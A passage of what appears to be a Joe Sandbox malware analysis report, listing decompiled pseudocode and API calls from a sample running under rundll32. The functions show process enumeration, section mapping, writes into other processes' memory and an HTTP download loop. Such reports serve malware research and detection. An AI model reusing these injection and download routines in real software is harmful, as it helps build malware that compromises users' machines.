                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 010043B4
                          • memcpy.NTDLL(?,00000000,0000001C), ref: 010043C1
                          • NtClose.NTDLL(?), ref: 010043D3
                          • NtClose.NTDLL(00000000), ref: 010043DD
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                          • String ID:
                          • API String ID: 2575439697-0
                          • Opcode ID: 0ded2d2aee42726f23e14d87d9f141ed84fd8bf0ec44519dd882decb3c5a57de
                          • Instruction ID: 03405c0b8e5e209493c3dd754971a5245cd38c6a65b0c4a8fe6a1a8586332a89
                          • Opcode Fuzzy Hash: 0ded2d2aee42726f23e14d87d9f141ed84fd8bf0ec44519dd882decb3c5a57de
                          • Instruction Fuzzy Hash: 502119B1900119BFEF12EF95DC84ADEBFBDEF08740F108022FA45E6150D7B29A549BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B76DE0 Relevance: 9.2, APIs: 6, Instructions: 238nativeCOMMON
                          Download Yara Rule
                          APIs
                          • memcpy.NTDLL(?,?,?,05B6C71A,?,?,?,?,?,05B6C71A,?,?,00000000), ref: 05B76F59
                            • Part of subcall function 05B6C4FB: GetModuleHandleA.KERNEL32(?,?,?,05B77017,?,?,?,00000000), ref: 05B6C539
                            • Part of subcall function 05B6C4FB: memcpy.NTDLL(?,05B8A30C,00000018,?,?,?), ref: 05B6C5B5
                          • memcpy.NTDLL(?,?,00000018,05B6C71A,?,?,?,?,?,05B6C71A,?,?,00000000), ref: 05B76FA7
                          • memcpy.NTDLL(?,05B7DD8F,00000800,?,?,?,00000000), ref: 05B7702A
                          • NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000000), ref: 05B77068
                          • NtClose.NTDLL(00000000,?,00000000), ref: 05B7708F
                            • Part of subcall function 05B78F62: GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,05B6C71A,05B6C71A,?,05B76EFA,?,05B6C71A,?,?,00000000), ref: 05B78F87
                            • Part of subcall function 05B78F62: GetProcAddress.KERNEL32(00000000,?), ref: 05B78FA9
                            • Part of subcall function 05B78F62: GetProcAddress.KERNEL32(00000000,?), ref: 05B78FBF
                            • Part of subcall function 05B78F62: GetProcAddress.KERNEL32(00000000,?), ref: 05B78FD5
                            • Part of subcall function 05B78F62: GetProcAddress.KERNEL32(00000000,?), ref: 05B78FEB
                            • Part of subcall function 05B78F62: GetProcAddress.KERNEL32(00000000,?), ref: 05B79001
                            • Part of subcall function 05B7BE80: NtMapViewOfSection.NTDLL(00000000,000000FF,05B6717E,00000000,00000000,05B6717E,?,00000002,00000000,?,05B6C71A,00000000,05B6717E,000000FF,?), ref: 05B7BEAE
                            • Part of subcall function 05B71CE4: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,05B6C71A,?,?,00000000), ref: 05B71D58
                            • Part of subcall function 05B71CE4: memcpy.NTDLL(?,?,?), ref: 05B71DBF
                          • memset.NTDLL ref: 05B770AA
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memcpy$AddressProc$HandleModuleSectionView$CloseUnmapmemset
                          • String ID:
                          • API String ID: 3674896251-0
                          • Opcode ID: 8cc52cc77bcfd06bf7572b1dd55ba32d46aeb718fc68aee84c7827fc02b8a828
                          • Instruction ID: 6fe803619924e8360028c8de2de37168a91fa38dae030392060d503f41a3d0bb
                          • Opcode Fuzzy Hash: 8cc52cc77bcfd06bf7572b1dd55ba32d46aeb718fc68aee84c7827fc02b8a828
                          • Instruction Fuzzy Hash: DFA12E71A0060AEFDF11DFA8C884BAEBBB5FF04304F1445A9E525A7250EB35BA54CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01001CA5 Relevance: 9.1, APIs: 6, Instructions: 124filenetworkCOMMON
                          Download Yara Rule
                          C-Code - Quality: 71%
                          			E01001CA5(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void _v20;
				void* __esi;
				void* _t30;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				int _t45;
				long _t47;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					if(InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8) != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x100a174(0, 1,  &_v12); // executed
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E01006D63(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
										if(_t45 != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E01006E40( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E01006C2C(_v16);
										if(_t64 == 0) {
											_t47 = E010015CC(_v12, _t69); // executed
											_t64 = _t47;
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E01006E40( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E01004A85(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}


















                          0x01001ca5
                          0x01001ca6
                          0x01001cac
                          0x01001cb7
                          0x01001cb7
                          0x01001cb9
                          0x01007395
                          0x0100739a
                          0x0100739c
                          0x010073b3
                          0x010073e4
                          0x010073e9
                          0x010074ac
                          0x010073ef
                          0x010073f6
                          0x010073fe
                          0x010074a9
                          0x01007404
                          0x01007409
                          0x0100740e
                          0x01007413
                          0x0100749b
                          0x01007419
                          0x01007419
                          0x0100741b
                          0x01007421
                          0x01007422
                          0x01007422
                          0x01007425
                          0x01007428
                          0x0100742e
                          0x0100743f
                          0x01007447
                          0x00000000
                          0x00000000
                          0x0100744f
                          0x01007457
                          0x01007463
                          0x01007467
                          0x01007469
                          0x0100746e
                          0x00000000
                          0x00000000
                          0x0100746e
                          0x01007467
                          0x01007480
                          0x01007483
                          0x0100748a
                          0x01007490
                          0x01007495
                          0x01007495
                          0x00000000
                          0x01007470
                          0x01007470
                          0x01007475
                          0x01007477
                          0x01007478
                          0x0100747b
                          0x00000000
                          0x0100747b
                          0x00000000
                          0x01007475
                          0x01007422
                          0x0100749c
                          0x0100749c
                          0x010074a2
                          0x010074a2
                          0x010073fe
                          0x010073b5
                          0x010073bb
                          0x010073c3
                          0x010073dc
                          0x010073de
                          0x00000000
                          0x00000000
                          0x010073c5
                          0x010073cf
                          0x010073d3
                          0x010073d9
                          0x00000000
                          0x010073d9
                          0x010073d3
                          0x010073c3
                          0x010074b5
                          0x01001cae
                          0x01001cae
                          0x01001cb5
                          0x01001cc0
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01001cb5

                          APIs
                          • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,76CC81D0,00000000,00000000), ref: 0100739C
                          • InternetReadFile.WININET(?,?,00000004,?), ref: 010073AB
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,0100593D,00000000,?,?), ref: 010073B5
                          • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0100593D,00000000,?), ref: 0100742E
                          • InternetReadFile.WININET(?,?,00001000,?), ref: 0100743F
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,0100593D,00000000,?,?), ref: 01007449
                            • Part of subcall function 01004A85: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,76CC81D0,00000000,00000000), ref: 01004A9C
                            • Part of subcall function 01004A85: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0100593D,00000000,?), ref: 01004AAC
                            • Part of subcall function 01004A85: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 01004ADE
                            • Part of subcall function 01004A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 01004B03
                            • Part of subcall function 01004A85: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 01004B23
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
                          • String ID:
                          • API String ID: 2393427839-0
                          • Opcode ID: 8c1ff984e928f03a03c0c4684d3e72aa7c985d95a8510f41feba855bdeb02d91
                          • Instruction ID: 39b954f629afeba9bf86f0d4c3b9ab6e084f1fc50282359a740cebc1e56002be
                          • Opcode Fuzzy Hash: 8c1ff984e928f03a03c0c4684d3e72aa7c985d95a8510f41feba855bdeb02d91
                          • Instruction Fuzzy Hash: 71410831600204BFEB639BA8CC40A9E7BFAAF84360F124564E5C5D71D0DF34F8018B50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B72331 Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05B7235C
                          • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 05B72369
                          • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 05B723F5
                          • GetModuleHandleA.KERNEL32(00000000), ref: 05B72400
                          • RtlImageNtHeader.NTDLL(00000000), ref: 05B72409
                          • RtlExitUserThread.NTDLL(00000000), ref: 05B7241E
                            • Part of subcall function 05B70818: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,05B72397,?), ref: 05B70820
                            • Part of subcall function 05B70818: GetVersion.KERNEL32 ref: 05B7082F
                            • Part of subcall function 05B70818: GetCurrentProcessId.KERNEL32 ref: 05B7084B
                            • Part of subcall function 05B70818: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 05B70868
                            • Part of subcall function 05B6C7B6: memcpy.NTDLL(00000000,?,?,?,?,?,?,?), ref: 05B6C815
                            • Part of subcall function 05B6A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,05B67D5E), ref: 05B6A6BE
                            • Part of subcall function 05B7212C: GetModuleHandleA.KERNEL32(?,?,?,?,?,05B6111D,00000000), ref: 05B7214D
                            • Part of subcall function 05B7212C: GetProcAddress.KERNEL32(00000000,?), ref: 05B72166
                            • Part of subcall function 05B7212C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,05B6111D,00000000), ref: 05B72183
                            • Part of subcall function 05B7212C: IsWow64Process.KERNEL32(?,?,?,?,?,?,05B6111D,00000000), ref: 05B72194
                            • Part of subcall function 05B7212C: FindCloseChangeNotification.KERNEL32(?,?,?,?,05B6111D,00000000), ref: 05B721A7
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Module$CreateFileHandleOpenThreadTime$AddressChangeCloseCurrentEventExitFindHeaderHeapImageInformationNameNotificationProcQuerySystemUserVersionWow64memcpy
                          • String ID:
                          • API String ID: 2581485877-0
                          • Opcode ID: f79e11014cbaa9fee03230947e24bc0615c40cacc96660ddbd5cdd5dd61b904e
                          • Instruction ID: 3adb19b545cda2376eaa759e8581dbfdcf5d164a51317dc971f732f45e499804
                          • Opcode Fuzzy Hash: f79e11014cbaa9fee03230947e24bc0615c40cacc96660ddbd5cdd5dd61b904e
                          • Instruction Fuzzy Hash: A0319135A00118AFCB22EF74DC89E7DBBA5FB45750F6141A9F626E7240DB34B944CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01004B89 Relevance: 6.0, APIs: 4, Instructions: 44sleepthreadtimeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 65%
                          			E01004B89(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t23 = _v12.dwHighDateTime;
					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t23 >> 5);
					_push(_t16);
					L010083A6();
					_t34 = _t16 + _t13;
					_t18 = E01005D2E(_a4, _t34);
					_t30 = _t18;
					_t19 = 3;
					Sleep(_t19 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}











                          0x01004b8e
                          0x01004b99
                          0x01004b9a
                          0x01004b9a
                          0x01004ba6
                          0x01004baf
                          0x01004bb2
                          0x01004bb6
                          0x01004bb8
                          0x01004bbd
                          0x01004bbe
                          0x01004bbf
                          0x01004bc9
                          0x01004bcc
                          0x01004bd3
                          0x01004bd7
                          0x01004bde
                          0x01004be4
                          0x01004bee

                          APIs
                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,01001D14,?,?), ref: 01004B9A
                          • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,01001D14,?,?), ref: 01004BA6
                          • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 01004BBF
                            • Part of subcall function 01005D2E: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 01005D8D
                          • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,01001D14,?,?), ref: 01004BDE
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                          • String ID:
                          • API String ID: 1610602887-0
                          • Opcode ID: c3fa2b5c4721efede2473b42c3d2e7711be02bcf5136634b7847f3070bea798d
                          • Instruction ID: 1f57333589efbce4efda07b751a7e412ed06621fec8a31cea2370b2c038e3f38
                          • Opcode Fuzzy Hash: c3fa2b5c4721efede2473b42c3d2e7711be02bcf5136634b7847f3070bea798d
                          • Instruction Fuzzy Hash: E9F0A477A002087BE7159BA4CC1EFDE77BDDB84355F040125F605E7280E6789A008750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010068BD Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                          Download Yara Rule
                          C-Code - Quality: 68%
                          			E010068BD() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x100a348; // 0x428d5a8
						_t2 = _t9 + 0x100beb0; // 0x73617661
						_push( &_v264);
						if( *0x100a12c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						FindCloseChangeNotification(_t17); // executed
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}










                          0x010068c8
                          0x010068cd
                          0x010068d2
                          0x010068d6
                          0x010068e0
                          0x01006911
                          0x010068e7
                          0x010068ec
                          0x010068f9
                          0x01006902
                          0x01006919
                          0x01006904
                          0x0100690c
                          0x00000000
                          0x0100690c
                          0x0100691a
                          0x0100691b
                          0x00000000
                          0x0100691b
                          0x00000000
                          0x01006915
                          0x01006921
                          0x01006926

                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 010068CD
                          • Process32First.KERNEL32(00000000,?), ref: 010068E0
                          • Process32Next.KERNEL32(00000000,?), ref: 0100690C
                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 0100691B
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                          • String ID:
                          • API String ID: 3243318325-0
                          • Opcode ID: eb8bddaac3157d429416eb20752e259b67291033c586acff8049aeca2fc658cf
                          • Instruction ID: 1bb67df8f07172ffb19dcccc9157ee9c90a1c707c0d32092155faaa0d2258082
                          • Opcode Fuzzy Hash: eb8bddaac3157d429416eb20752e259b67291033c586acff8049aeca2fc658cf
                          • Instruction Fuzzy Hash: 09F0B1711011196AF733A7768C48EEF37ADDBC5314F000161FAC5D7040EB35DA658761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6710A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000), ref: 05B67167
                            • Part of subcall function 05B7BE80: NtMapViewOfSection.NTDLL(00000000,000000FF,05B6717E,00000000,00000000,05B6717E,?,00000002,00000000,?,05B6C71A,00000000,05B6717E,000000FF,?), ref: 05B7BEAE
                          • memset.NTDLL ref: 05B6718B
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Section$CreateViewmemset
                          • String ID: @
                          • API String ID: 2533685722-2766056989
                          • Opcode ID: 04c01abe87f767a248b9930281d971bf0f910e73e3e0dd3ac0084e908f5bf650
                          • Instruction ID: 41c39cf4ab4b8cf37afe9f021df0e849cc524208c07b7af40c0223e29e96add5
                          • Opcode Fuzzy Hash: 04c01abe87f767a248b9930281d971bf0f910e73e3e0dd3ac0084e908f5bf650
                          • Instruction Fuzzy Hash: 8621FCB5D0020DAFDB11DFA9C8849EEFBB9FF48354F20456AE616F3250D634AA458B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B761AE Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcAddress.KERNEL32(?,00000318), ref: 05B761D3
                          • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 05B761EF
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                            • Part of subcall function 05B7A806: GetProcAddress.KERNEL32(?,00000000), ref: 05B7A82F
                            • Part of subcall function 05B7A806: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,05B76230,00000000,00000000,00000028,00000100), ref: 05B7A851
                          • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 05B76359
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                          • String ID:
                          • API String ID: 3547194813-0
                          • Opcode ID: b81308a481570d492fd416c6133e04ab0a19bb9c415fd9b22f8d9c8a8751bc86
                          • Instruction ID: 0c0ab38332411b7fead89b49bf0002d6b3175f251815c4f1c59f21280e80bedd
                          • Opcode Fuzzy Hash: b81308a481570d492fd416c6133e04ab0a19bb9c415fd9b22f8d9c8a8751bc86
                          • Instruction Fuzzy Hash: 9D612071A0460AAFDF15DF98C980BEEBBB5FF08300F114599E915A7241D770F954CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B70782 Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON
                          Download Yara Rule
                          APIs
                          • memset.NTDLL ref: 05B70796
                          • GetProcAddress.KERNEL32(?), ref: 05B707BE
                          • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 05B707DC
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressInformationProcProcess64QueryWow64memset
                          • String ID:
                          • API String ID: 2968673968-0
                          • Opcode ID: b9293f5b447be1796c1e44af937af93feb3a76ef6e486bc7d99cc5192819ec30
                          • Instruction ID: 7f5f9c6a1cc4a9a8d3c7961b7b0beb20bd9ead3cb32bec35c2d2d4894a1aa583
                          • Opcode Fuzzy Hash: b9293f5b447be1796c1e44af937af93feb3a76ef6e486bc7d99cc5192819ec30
                          • Instruction Fuzzy Hash: 7C119E35A1021DAFDB10EB94DC49FAA7BA9EB45700F04406AF914EB280EB70F905CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B77950 Relevance: 4.5, APIs: 3, Instructions: 29memorynativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtAllocateVirtualMemory.NTDLL(05B7EB0F,00000000,00000000,05B7EB0F,00003000,00000040), ref: 05B77981
                          • RtlNtStatusToDosError.NTDLL(00000000), ref: 05B77988
                          • SetLastError.KERNEL32(00000000), ref: 05B7798F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Error$AllocateLastMemoryStatusVirtual
                          • String ID:
                          • API String ID: 722216270-0
                          • Opcode ID: bf5495a1cc6d4379ca320fab77688613bb09bafa049d563fe9cc415c4a644ceb
                          • Instruction ID: 5ffcfd69798215bec0691c21529f5438289baf5718d55d9552c70ac4da756df1
                          • Opcode Fuzzy Hash: bf5495a1cc6d4379ca320fab77688613bb09bafa049d563fe9cc415c4a644ceb
                          • Instruction Fuzzy Hash: 00F0FEB1521309FBEB05DB94D90AFBE7BBCEB44355F104048B601A6180EFB4BB04DB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B75312 Relevance: 4.5, APIs: 3, Instructions: 26nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtWriteVirtualMemory.NTDLL(?,00000004,00000000,00000000,?,76C86780,?,05B7907F,?,00000004,00000000,00000004,?), ref: 05B75330
                          • RtlNtStatusToDosError.NTDLL(C0000002), ref: 05B7533F
                          • SetLastError.KERNEL32(00000000,?,05B7907F,?,00000004,00000000,00000004,?,?,?,?,05B6C691,?,00000000,CCCCFEEB,?), ref: 05B75346
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Error$LastMemoryStatusVirtualWrite
                          • String ID:
                          • API String ID: 1089604434-0
                          • Opcode ID: 6c8050b95decf359839cda9df7570365f659b066db97a13e487b06beba708df2
                          • Instruction ID: 9b4b42acc54b88132a484ed550de0d9ec7369079d6e07e1d645acd74766fd3f7
                          • Opcode Fuzzy Hash: 6c8050b95decf359839cda9df7570365f659b066db97a13e487b06beba708df2
                          • Instruction Fuzzy Hash: 04E09A3621421EBBCF215EE8AC05DEE7F6AFB08651B015015BE16D3160DA71F861EBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0100190C Relevance: 3.1, APIs: 2, Instructions: 70nativeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E0100190C(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E01006D0A(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                          0x01001915
                          0x0100191c
                          0x0100191d
                          0x0100191e
                          0x0100191f
                          0x01001920
                          0x01001931
                          0x01001935
                          0x01001949
                          0x0100194c
                          0x0100194f
                          0x01001956
                          0x01001959
                          0x01001960
                          0x01001963
                          0x01001966
                          0x01001969
                          0x0100196e
                          0x010019a9
                          0x01001970
                          0x01001973
                          0x01001979
                          0x0100197e
                          0x01001982
                          0x010019a0
                          0x01001984
                          0x0100198b
                          0x01001999
                          0x01001999
                          0x01001982
                          0x010019b1

                          APIs
                          • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000,0100459D), ref: 01001969
                            • Part of subcall function 01006D0A: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0100197E,00000002,00000000,?,?,00000000,?,?,0100197E,00000000), ref: 01006D37
                          • memset.NTDLL ref: 0100198B
                          Memory Dump Source
